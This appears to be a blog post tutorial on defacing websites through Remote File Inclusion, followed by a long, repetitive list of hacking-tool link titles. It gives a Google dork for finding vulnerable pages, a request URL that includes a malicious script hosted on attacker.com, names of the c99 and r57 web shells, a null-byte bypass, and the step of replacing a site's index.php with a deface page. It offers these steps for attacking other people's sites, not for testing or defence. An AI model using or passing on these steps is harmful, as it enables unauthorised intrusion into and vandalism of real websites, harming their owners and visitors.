Saturday 20 January 2024

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.

Related posts


  1. Hacking Tools Github
  2. Hacker Tools Mac
  3. Hacking Tools Hardware
  4. Pentest Tools For Windows
  5. Nsa Hack Tools
  6. Hacking Tools For Mac
  7. Pentest Tools For Ubuntu
  8. Hacker Tools For Ios
  9. Hacking Tools Hardware
  10. Hacking Tools For Windows
  11. Pentest Tools
  12. Hack Tools Github
  13. Pentest Tools
  14. Hacking Tools And Software
  15. Hacking Tools Name
  16. Pentest Tools Download
  17. Hacker Tools Apk Download
  18. Hacker Tools Apk Download
  19. Pentest Tools Review
  20. Hack Tools For Ubuntu
  21. Termux Hacking Tools 2019
  22. Hacks And Tools
  23. Hacker Tools Free Download
  24. Pentest Tools For Windows
  25. Pentest Box Tools Download
  26. Hacking App
  27. Hacking Tools Github
  28. Kik Hack Tools
  29. Nsa Hack Tools Download
  30. Hacking Tools 2020
  31. Hack Tools For Windows
  32. Computer Hacker
  33. Hacking Tools
  34. Pentest Tools Subdomain
  35. How To Hack
  36. Hacking Tools Free Download
  37. Hacking Tools For Games
  38. Hack Tools 2019
  39. Hacking Tools 2020
  40. Hacker Tools Online
  41. Pentest Tools Download
  42. Hacker Tools For Windows
  43. Tools For Hacker
  44. Hacking Apps
  45. Pentest Box Tools Download
  46. New Hacker Tools
  47. Termux Hacking Tools 2019
  48. Android Hack Tools Github
  49. Hack Website Online Tool
  50. Hacker Techniques Tools And Incident Handling
  51. Hack Tools Github
  52. Pentest Tools Github
  53. Pentest Tools Open Source
  54. Hacking App
  55. Github Hacking Tools
  56. Nsa Hacker Tools
  57. Pentest Tools Kali Linux
  58. Pentest Tools For Ubuntu
  59. Blackhat Hacker Tools
  60. Hack Tools For Mac
  61. Hack Tools For Games
  62. Hacking Tools Windows 10
  63. Hak5 Tools
  64. Hacking Tools Online
  65. Hacker Tools For Mac
  66. Hacking Tools For Games
  67. Hacking Tools 2019
  68. Hack Tools Pc
  69. Pentest Tools Tcp Port Scanner
  70. Pentest Tools Website
  71. How To Install Pentest Tools In Ubuntu
  72. Pentest Tools Website
  73. Hacker Tools Mac
  74. Tools For Hacker
  75. Hack Tools Mac
  76. Hacking Tools 2019
  77. Growth Hacker Tools
  78. Pentest Recon Tools
  79. Pentest Tools Github
  80. How To Hack
  81. Pentest Tools For Ubuntu
  82. Hacking Tools Hardware
  83. Nsa Hack Tools
  84. Github Hacking Tools
  85. Hacking Tools Download
  86. World No 1 Hacker Software
  87. Hack Tools Mac
  88. Hack Tools For Pc
  89. Hacking Tools For Windows Free Download
  90. Hacker Tools Mac
  91. Pentest Tools Url Fuzzer
  92. Hacking Tools Mac
  93. Termux Hacking Tools 2019
  94. Hack Tools For Games
  95. Hacking Tools For Windows Free Download
  96. Pentest Tools Apk
  97. Hack App
  98. Pentest Tools Open Source
  99. Pentest Tools Windows
  100. Nsa Hacker Tools
  101. Hacking Tools
  102. Pentest Tools Framework
  103. Pentest Tools Url Fuzzer
  104. Pentest Tools For Mac
  105. Hack App
  106. Pentest Tools Url Fuzzer
  107. Pentest Tools Framework
  108. Physical Pentest Tools
  109. Hackrf Tools
  110. Hacking Tools Name
  111. Hack Tools
  112. Pentest Tools For Ubuntu
  113. Tools Used For Hacking
  114. Hacker
  115. Hacker Tools Linux
  116. How To Hack
  117. Pentest Tools Open Source
  118. Hacker Security Tools
  119. Hacking Tools For Pc
  120. Usb Pentest Tools
  121. Underground Hacker Sites
  122. Tools Used For Hacking
  123. What Is Hacking Tools
  124. Hack Tools For Ubuntu
  125. Hack Tools For Mac
  126. Hacking Tools Free Download
  127. Hacking Tools Free Download
  128. Hacking Tools Windows 10
  129. Hack Tools Download
  130. Game Hacking
  131. Best Hacking Tools 2019
  132. Hacking Tools Online
  133. Hacker Tools Mac
  134. Black Hat Hacker Tools
  135. Hacking Tools Online
  136. Hack Tools
  137. Tools 4 Hack
  138. Hacker Tools 2020
  139. Hacker Security Tools
  140. Beginner Hacker Tools
  141. Hacking Tools Hardware
  142. Hack Tools For Games
  143. Hacker Tools Free
  144. Kik Hack Tools
  145. Pentest Recon Tools
  146. Pentest Tools Subdomain
  147. Tools For Hacker
  148. Ethical Hacker Tools

No comments:

Post a Comment